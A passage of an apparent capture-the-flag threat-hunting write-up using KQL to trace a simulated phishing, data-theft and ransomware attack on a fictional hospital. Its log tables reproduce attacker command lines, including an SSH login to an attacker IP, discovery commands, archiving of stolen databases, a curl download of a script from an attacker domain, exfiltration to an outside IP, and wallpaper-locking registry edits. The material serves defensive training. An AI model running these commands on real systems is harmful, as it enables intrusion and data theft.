| where subject =~ "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨"
| distinct sender;
let bad_domains =
Email
| where sender in (bad_emails)
or reply_to in (bad_emails)
| distinct tostring(parse_url(link).Host);
OutboundNetworkEvents
| where tostring(parse_url(url).Host) in (bad_domains)
| distinct src_ip
| lookup Employees on $left.src_ip == $right.ip_addr
| distinct role, name, src_ip, hostname
| sort by role asc
Query Results
role name src_ip hostname
Database Administrator Roy Trenneman 10.10.0.2 SUPER-DB-SERVER-9000
Interns Judy Tomlinson 10.10.0.54 THSQ-DESKTOP
Interns Eunice Birks 10.10.0.66 CF1D-LAPTOP
Interns Scott Horwath 10.10.0.34 7WSV-MACHINE
Interns Constance Eldredge 10.10.0.61 ZWU6-MACHINE
Interns Anita Hummel 10.10.0.105 C4O7-LAPTOP
Interns Dean Aitken 10.10.0.86 JSJU-MACHINE
Interns Michael Frith 10.10.0.19 UBAA-MACHINE
Interns Monte Baez 10.10.0.35 3ORE-LAPTOP
Interns Michael Bauer 10.10.0.31 7IXV-LAPTOP
Interns Geneva Arthur 10.10.0.110 5QJC-DESKTOP
Interns Joseph Markland 10.10.0.69 P3EX-DESKTOP
Interns Carla Bledsoe 10.10.0.108 AI4T-LAPTOP
Interns Thomas Mccloskey 10.10.0.46 JFJD-MACHINE
Interns Susan Deloatch 10.10.0.117 5VHH-DESKTOP
Resident Doctors Bradley Park 10.10.0.221 1RE1-MACHINE
Resident Doctors Justin Flores 10.10.0.63 S3FA-LAPTOP
Resident Doctors Archie Mireles 10.10.0.78 Y6J9-DESKTOP
Resident Doctors Christina Tate 10.10.0.157 QWTX-DESKTOP
Resident Doctors Claire Nastasi 10.10.0.224 WVGN-MACHINE
Resident Doctors Gary Berger 10.10.0.229 6U1W-LAPTOP
Resident Doctors Scott Thibault 10.10.0.183 XUCT-MACHINE
Resident Doctors Jonathan Bueno 10.10.0.112 KFL4-DESKTOP
Resident Doctors Beatrice Hogg 10.10.0.103 EF2R-DESKTOP
Resident Doctors Elizabeth Harris 10.10.0.175 FXXV-DESKTOP
Resident Doctors Sheldon Pella 10.10.0.133 XBYY-DESKTOP
Resident Doctors Lillian Mcfarland 10.10.0.71 YO0I-MACHINE
Resident Doctors Maudie Frierson 10.10.0.154 9R9Z-MACHINE
Resident Doctors Charles Roberge 10.10.0.166 60BK-LAPTOP
Resident Doctors Harry Barnes 10.10.0.106 SIJP-LAPTOP
Resident Doctors John Walker 10.10.0.187 MBJX-DESKTOP
Resident Doctors Claire Arce 10.10.0.202 CKQF-MACHINE
Resident Doctors Charlene Simpson 10.10.0.167 QNTA-DESKTOP
Resident Doctors Dolores Rader 10.10.0.170 0N1N-LAPTOP
Resident Doctors Melvin Hudgens 10.10.0.96 M8D0-MACHINE
Resident Doctors Jerry Jones 10.10.0.174 ZQHM-LAPTOP
Resident Doctors Edward Williamson 10.10.0.16 QKD1-MACHINE

The IP address that downloaded New_Healthcare_Protocols.docm, followed by UrTottalyPwned.bat, belongs to the Database Administrator Roy Trenneman, who also designed and created the current ERP system in use by the hospital.

I want to check how many instances of these files exist on Azure Crest computers; to do so, I use:

let bad_emails =
Email
| where subject =~ "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨"
| distinct sender;
let bad_domains =
Email
| where sender in (bad_emails)
or reply_to in (bad_emails)
| distinct tostring(parse_url(link).Host);
OutboundNetworkEvents
| where tostring(parse_url(url).Host) in (bad_domains)
| distinct tostring(parse_path(tostring(parse_url(url).Path)).Filename)
| lookup FileCreationEvents on $left.Filename == $right.filename
| summarize count() by Filename
Query Results
Filename count_
UrTottalyPwned.bat 1
New_Healthcare_Protocols.docm 23
Pediatric_Care_Update.docm 15

A total of 39 files; 38 are dropper files, and one is likely the malware responsible for locking up the database (or destroying it; in any case, the data is inaccessible).

Given these events, I'll investigate the Database Administrator's device.

ProcessEvents
| where hostname == "SUPER-DB-SERVER-9000"
and timestamp >= datetime(2024-03-04 11:28:18.0000)
and process_commandline !contains "SystemApps"
and process_commandline !contains "WindowsApps"
and process_commandline !contains "Edge"
and process_commandline !contains "Teams"
Query Results
This table has been redacted; it only shows the most relevant findings, rather than the entire output of the KQL query above.
timestamp parent_process_name parent_process_hash process_commandline process_name process_hash hostname username
2024-03-04 11:29:21.0000 Explorer.exe 55df41f4f034802c82b219ecc3e3339b518a4dd1ea50371b8eb8de0daa6ef354 Explorer.exe "C:\Users\rotrenneman\Downloads\New_Healthcare_Protocols.docm" Explorer.exe e8f6a9348ea4743447d103eff057f35cb3485456c5b67f9934683d3dd386027e SUPER-DB-SERVER-9000 rotrenneman
2024-03-04 11:29:22.0000 Explorer.exe 088bd1b9347628a59b3b6537becede6519bc3b03e419cea5923754022f2b60ed C:\ProgramData\Heartburn\heartburn.zip heartburn.zip 2849083eaa125abb7b4470fc0a7f7b750d37dd9e8b20072c2498a14117d61de3 SUPER-DB-SERVER-9000 rotrenneman
2024-03-04 13:15:22.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f cmd.exe /c Expand-Archive -Path C: \ProgramData\heartburn.zip -DestinationPath C:\ProgramData\Heartburn cmd.exe 77fe1648d77984e988057b0d63301992addaa99970d0a7a92a9d522838f61b0c SUPER-DB-SERVER-9000 rotrenneman
2024-03-04 14:42:22.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f cmd.exe /c C:\ProgramData\Heartburn\putty.exe -ssh 93.142.203.80 -l have_ya_tried -pw turning_it_off_and_on_again cmd.exe f55450e9502d007a5d594963452d93f9872aa5d082b5ec362a64c2be4b8b9941 SUPER-DB-SERVER-9000 rotrenneman
2024-03-05 14:39:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f whoami cmd.exe 6ad6e6583a2a2d83067c4bf6d5d203ac6967496b52098acfa12f00751d01a602 SUPER-DB-SERVER-9000 rotrenneman
2024-03-05 15:32:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net user /domain cmd.exe fa9ef7377baf4f016e065a0a8d46bc1622b9ab812c2a0f717e0249e941e6b60a SUPER-DB-SERVER-9000 rotrenneman
2024-03-05 15:49:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net group "domain computers" /domain cmd.exe e44cab19d18614698466a708dbd792bd3e86d6624cd7bb55a6e8df32a9ea0c9f SUPER-DB-SERVER-9000 rotrenneman
2024-03-05 15:53:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net group "domain admins" /domain cmd.exe eac4215395c4df12f023c7ae26a50daed98161285e19c78258064e1e936eae0f SUPER-DB-SERVER-9000 rotrenneman
2024-03-05 16:17:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net localgroup administrators cmd.exe f48c129660214478c54f068ad6be33bdb136d98a826f919f11c70ad40111f3eb SUPER-DB-SERVER-9000 rotrenneman
2024-04-01 15:26:23.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f dbhunter.exe --search --filetype .db .sql .mdb --output C:\\In\\found_databases.txt dbhunter.exe 191fd9ea5f7a66b56c8ba06aa19ba75e85c01bd377eb68b019a1bef20a8fbd36 SUPER-DB-SERVER-9000 rotrenneman
2024-04-01 15:33:23.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f for /f %i in (C:\\In\\found_databases.txt) do copy %i C:\\Out\\ cmd.exe 18915f7dbcf0fdf0c4850c3f3c6dfaeee86ee2308a336971e64041e016d46b15 SUPER-DB-SERVER-9000 rotrenneman
2024-04-01 16:05:36.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f 7z.exe a -t7z C:\\Out\\Financial_Records.7z C:\\Out\\*financial*.db -p finnaberich cmd.exe e1973f0e63aa68e81e20dc0a4b39f2d41c9762c5b0f74acd2a765c1c606f1208 SUPER-DB-SERVER-9000 rotrenneman
2024-04-01 16:23:36.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f 7z.exe a -t7z C:\\Out\\Patient_Records.7z C:\\Out\\*patient*.sql -p i<3mulah cmd.exe b590e0b702031683099aba6fd6d39887083f67a7b4d54fd3df07001abcd7ccf7 SUPER-DB-SERVER-9000 rotrenneman
2024-04-01 17:12:36.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f 7z.exe a -t7z C:\\Out\\Roys_Meme_Collection.7z C:\\Out\\*meme*.mdb -p mommawemadeit cmd.exe ca5bf21d9e885b0811bd066559a3a82299c6eb311cd998b5e984cf15e40570fb SUPER-DB-SERVER-9000 rotrenneman
2024-04-01 17:35:22.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f curl.exe -o C:\ProgramData\Heartburn\anydesk_automation.ps1 https://unhealthyrecordsystems.tech/anydesk_automation.ps1 cmd.exe a95d3d52df491df12c3e306b6f8ef1d1467de8659f71b2b8f4963f1cd29d9a1e SUPER-DB-SERVER-9000 rotrenneman
2024-04-02 11:21:00.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f powershell -File C:\ProgramData\Heartburn\anydesk_automation.ps1 -TargetIP 198.206.213.188 -Password 'thxfodacaviar' -FileToTransfer 'C:\Out\*' powershell.exe eee68e534cebefaa42debb31046c7bce4cd229612ab376c5951cf78513031bfa SUPER-DB-SERVER-9000 rotrenneman
2024-04-02 11:31:47.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f cmd.exe /c C:\\Windows\\Temp\\UrTottalyPwned.bat cmd.exe 8dd091f8cb572ab649a1678db2d683cfd26520f1b02dc51589a8a8fc385a2fff SUPER-DB-SERVER-9000 rotrenneman
2024-04-02 11:53:57.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f cmd.exe /c reg add 'HKCU\Control Panel\Desktop' /v Wallpaper /t REG_SZ /d 'C:\Users\Public\ItWentWrong.jpg' /f && reg add 'HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System' /v Wallpaper /t REG_SZ /d 'C:\Users\Public\ItWentWrong.jpg' /f cmd.exe cc59d11d08489135071b8070da3b3048511c5b76c249c284e2cc494e054afa86 SUPER-DB-SERVER-9000 rotrenneman
2024-04-02 12:44:57.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f cmd.exe /c reg add 'HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop' /v NoChangingWallPaper /t REG_SZ /d 1 /f && reg add 'HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop' /v NoChangingWallPaper /t REG_SZ /d 1 /f cmd.exe 2f0a4a732f33a62b87a3008bc71de6bfec739763a23b031d5119d3a2300b5ad9 SUPER-DB-SERVER-9000 rotrenneman

After Roy opened the macro-enabled Microsoft Word document (.docm), it dropped an archive named heartburn.zip, which is decompressed to a dedicated folder Heartburn in the target's ProgramData directory; putty.exe is executed and used to establish a SSH (Secure Shell) connection to an attacker-controlled server (in this case, IP address 93.142.203.80, with the username have_ya_tried and the password turning_it_off_and_on_again). The threat actor now has hands-on-keyboard access to the Database Administartor's device, and starts executing a typical set of discovery commands:

  • whoami: Displays user, group and privileges information for the user who is currently logged on to the local system. If used without parameters, whoami displays the current domain and user name. [Microsoft Learn].
  • net user /domain: Displays all users belonging to the domain. [Microsoft Learn]
  • net group "domain computers" /domain: Displays all users belonging to the group "domain computers" in the domain. [Microsoft Learn]
  • net group "domain admins" /domain: Displays all users belonging to the group "domain admins" in the domain. [Microsoft Learn]
  • net localgroup administrators: Used without additional parameters, **net localgroup <**GroupName> displays a list of users or global groups in a local group.. [Microsoft Learn]

dbhunter.exe is downloaded off the internet via Microsoft Edge (per FileCreationEvents) and executed to dump a list of all found databases as a plain text file on a staging folder. They use this list to programmatically copy, compress and encrypt sensitive data (such as financial records, patient records, and Roy's meme collection) off the database(s) located in Roy's device (which doubles as the hospital's server). The archives are: Financial_Records.7z (password: finnaberich), Patient_Records.7z (password: i<3mulah) and Roys_Meme_Collection.7z (password: mommawemadeit). The threat actor then uses cURL to download the PowerShell script anydesk_automation.ps1 off their server (unhealthyrecordsystems.tech). This script is run and used to connect to IP address 198.206.213.188 with the password thxfodacaviar and exfiltrate all previously created .7z archives.

Finally, they execute UrTotallyPwned.bat--downloaded at some point by the threat actor; there are no emails or other signs that Roy navigated to the download on their own--and replace all hospital computer's desktop wallpapers with a taunting image, and further disabled the ability to manually change it back.

I'll backtrack a bit and look for signs of the threat actor's recon efforts against Azure Crest in the next section.

Section 4 - dERPy Database

Repurposing my previous KQL queries, I use this to determine any threat actor activity in our website prior, during and after the attack:

let bad_emails =
Email
| where subject =~ "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨"
| distinct sender;
let bad_domains =
Email
| where sender in (bad_emails)
or reply_to in (bad_emails)
| distinct tostring(parse_url(link).Host);
Email
| where tostring(parse_url(link).Host) in (bad_domains)
| distinct tostring(parse_url(link).Host)
| lookup PassiveDns on $left.Host == $right.domain
| distinct ip
| lookup InboundNetworkEvents on $left.ip == $right.src_ip
| sort by timestamp asc
Query Results
ip timestamp method user_agent url status_code
25.126.98.121
115.12.60.150 2024-03-01 00:00:00.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=hospital+network+architecture 200
131.190.102.173 2024-03-01 08:11:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=pediatric+department+internal+procedures 200
16.101.245.182 2024-03-01 09:07:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=employee+contact+list 200
96.120.124.180 2024-03-01 09:29:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=IT+security+protocols 200
135.103.59.74 2024-03-01 10:23:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=How+many+money+does+Azure+Crest+Hospital+have%3F 200
62.121.133.43 2024-03-01 10:59:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Is+Azure+Crest+Hospital+loaded+with+cash%3F 200
93.142.203.80 2024-03-01 11:05:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Does+Azure+Crest+Hospital+have+a+lot+of+money%3F 200
135.103.59.74 2024-03-01 11:16:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Azure+crest+ERP+systems 200
131.190.102.173 2024-03-01 11:51:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Roy+Trenemman+Azure+Crest 200
115.12.60.150 2024-03-01 12:08:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Penny+Pincher+Azure+Crest 200
131.190.102.173 2024-03-01 12:23:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Azure+Crest+Hospital+financial+reports 200
16.101.245.182 2024-03-01 12:35:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Azure+Crest+Hospital+financial+statements 200
131.92.62.82 2024-03-01 13:28:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Azure+Crest+Hospital+financial+data 200
131.92.62.82 2024-03-01 13:45:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Azure+Crest+Hospital+financials 200
131.190.102.173 2024-03-01 13:48:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Azure+Crest+Hospital+Cyber+Security+team 200
115.12.60.150 2024-03-01 14:43:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Azure+Crest+Hospital+IT+Security+team 200
131.92.62.82 2024-03-01 14:48:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=pediatric+patient+records 200
131.92.62.82 2024-03-01 15:12:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=pediatric+patient+medical+history 200
131.190.102.173 2024-03-01 15:37:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=pediatric+patient+medical+records 200
131.190.102.173 2024-03-01 15:50:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=where+are+pediatric+patient+records+stored 200
115.12.60.150 2024-03-01 16:01:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=how+to+access+pediatric+patient+records 200
115.12.60.150 2024-03-01 16:28:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/internal_share/medical_records/pediatric 200
93.142.203.80 2024-03-01 16:28:41.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/staff_directory/pediatric_department 200
135.103.59.74 2024-03-01 16:28:50.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/IT_security_policies 200
93.142.203.80 2024-03-01 16:29:14.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/news/penny-pincher-boasts-about-cost-cutting-on-it-department 200
115.12.60.150 2024-03-01 16:30:03.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/news/half-of-it-department-fired 200
16.101.245.182 2024-03-01 16:30:09.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/news/roy-trenemman-joins-azure-crest-to-save-money-on-erp-systems 200
93.142.203.80 2024-03-01 16:30:21.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/news/research/roy-trenemman-invents-new-architecture-database-systems 200
115.12.60.150 2024-03-01 16:30:26.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/news/research/why-running-your-own-erp-systems-is-a-good-idea 200
215.95.144.58 2024-03-01 16:31:06.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/news/research/why-pay-for-expensive-erp-systems-when-you-can-run-your-own 200
115.12.60.150 2024-03-01 16:31:56.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/news/research/how-azure-crest-is-revolutionizing-the-way-it-is-done 200
16.101.245.182 2024-03-01 16:32:39.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/news/research/run-your-own-erp-systems-on-sqlite-what-could-possibly-go-wrong 200

Evidently, the threat actor did their research. Notably, out of all their IP addresses, only one didn't browse our webpage.

The information they looked for included (clumsily) the hospital's finances (esp. revenue and profits), the hospital's network architecture, IT protocols, employee contact information, IT staff and cybersecurity staff, and information on the ERP system, including on its designer, Database Administrator Roy Trenemman; the recent staff layoffs and other cost-cutting measures (that included the creation and implementation of an in-house ERP system); and information on the ERP system's design, such as technologies used (SQlite, among others). Most damning, the threat actors were looking for ways to access pediatric patient records.

Unfortunately, they did access the internal share containing these records (https://azurecresthospital.med/internal_share/medical_records/pediatric) on March 1st.

As mentioned, UrTotallyPwned.bat rendered the databases inaccessible. Perhaps FileCreationEvents has a hint; for example, if they were encrypted, and if so with what file extension, what hostnames could've been affected besides the server, etcetera.

FileCreationEvents
| where timestamp >= datetime(2024-04-02 11:31:47.0000) //when the Batch script was executed
Query Results
This table has been redacted; it only shows the most relevant findings, rather than the entire output of the KQL query above.
timestamp hostname username sha256 path filename process_name
2024-04-02 11:32:29.0000 SUPER-DB-SERVER-9000 rotrenneman 3b8daeb7c5307430f836c6ca58b432828ea58dcc8b6dd953f12e6eeeb8e86c29 C:\System\Database\hospital_scheduling.db.scholopendra hospital_scheduling.db.scholopendra explorer.exe
2024-04-02 11:32:48.0000 SUPER-DB-SERVER-9000 rotrenneman c551a57313e279dada8f0d580f6cbbff68820f0bcd22115b8872f92257048ada C:\System\Database\financial_data.db.scholopendra financial_data.db.scholopendra explorer.exe
2024-04-02 11:32:49.0000 SUPER-DB-SERVER-9000 rotrenneman d4651af07de3c464181de6c0c1f39a27f279eaf342596b2ae067aca964eaf364 C:\System\Database\employee_info.db.scholopendra employee_info.db.scholopendra explorer.exe
2024-04-02 11:32:52.0000 SUPER-DB-SERVER-9000 rotrenneman a1aa6bccae477706d0f47c2302bd8183c86fb39a158f8e804fee97a291ee3b02 C:\System\Database\pediatric_patient_data.db.scholopendra pediatric_patient_data.db.scholopendra explorer.exe
2024-04-02 11:33:14.0000 SUPER-DB-SERVER-9000 rotrenneman efbdda5c9a85317cae21333e09f2f622a5b14ebe8b7c5d80aca306f4957f953d C:\System\Database\research_data.db.scholopendra research_data.db.scholopendra explorer.exe
2024-04-02 11:33:16.0000 SUPER-DB-SERVER-9000 rotrenneman ccbaab672fd2a8412d61f0a82838633052544e6bf5996ed9c5bbf503665de6b8 C:\System\Database\medical_inventories.db.scholopendra medical_inventories.db.scholopendra explorer.exe
2024-04-02 11:33:17.0000 SUPER-DB-SERVER-9000 rotrenneman 6c9e68ecce293439118058f371c3f42b1b8b755553eada70e010a206ca6f5a8a C:\System\Database\patient_records.db.scholopendra patient_records.db.scholopendra explorer.exe
2024-04-02 11:36:30.0000 SUPER-DB-SERVER-9000 rotrenneman 4f31fbaf3f3c5f3c5d5338154769ccfe74530e30bb5f307a02bdef59d98dc507 C:\In\ItWentWrong.jpg ItWentWrong.jpg firefox.exe
2024-04-02 11:37:54.0000 SUPER-DB-SERVER-9000 rotrenneman 80116ec6ed1f703b11bf20f46523115ee1ed8a297f9104569e7b206f81d69d51 C:\Users\rotrenneman\Desktop\WhatCouldPossiblyGoWrong.txt WhatCouldPossiblyGoWrong.txt explorer.exe

Not shown in the table above (which is an excerpt of the full results), but the Batch script encrypted all of Roy Trenemman's files (such as miscellaneous documents, images, etc.) and, since his device doubled as the hospital's ERP server, the databases themselves. Further, it's shown when the threat actor downloaded the mocking ransom wallpaper (which was set as the desktop wallpaper across all devices) and a ransom note (or otherwise a taunt) named WhatCouldPossiblyGoWrong.txt, likely referencing an article of that nature that the threat actors read during their recon.

The files were encrypted and appended with the .scholopendra file extension.

Section 5 - Bonus: Mo' Money Mo' Problems

Breaking kayfabe for a bit, but this section of the game corresponds to various trivia questions (such as who hosts what cybersecurity podcast) and some slight CTF-like puzzles (such as deobfuscating strings that use a variety of cipher algorithms, such as ROT13, or encoding algorithms such as base64). It is thus omitted; but I do recommend tools such as CyberChef and dCode.fr for these.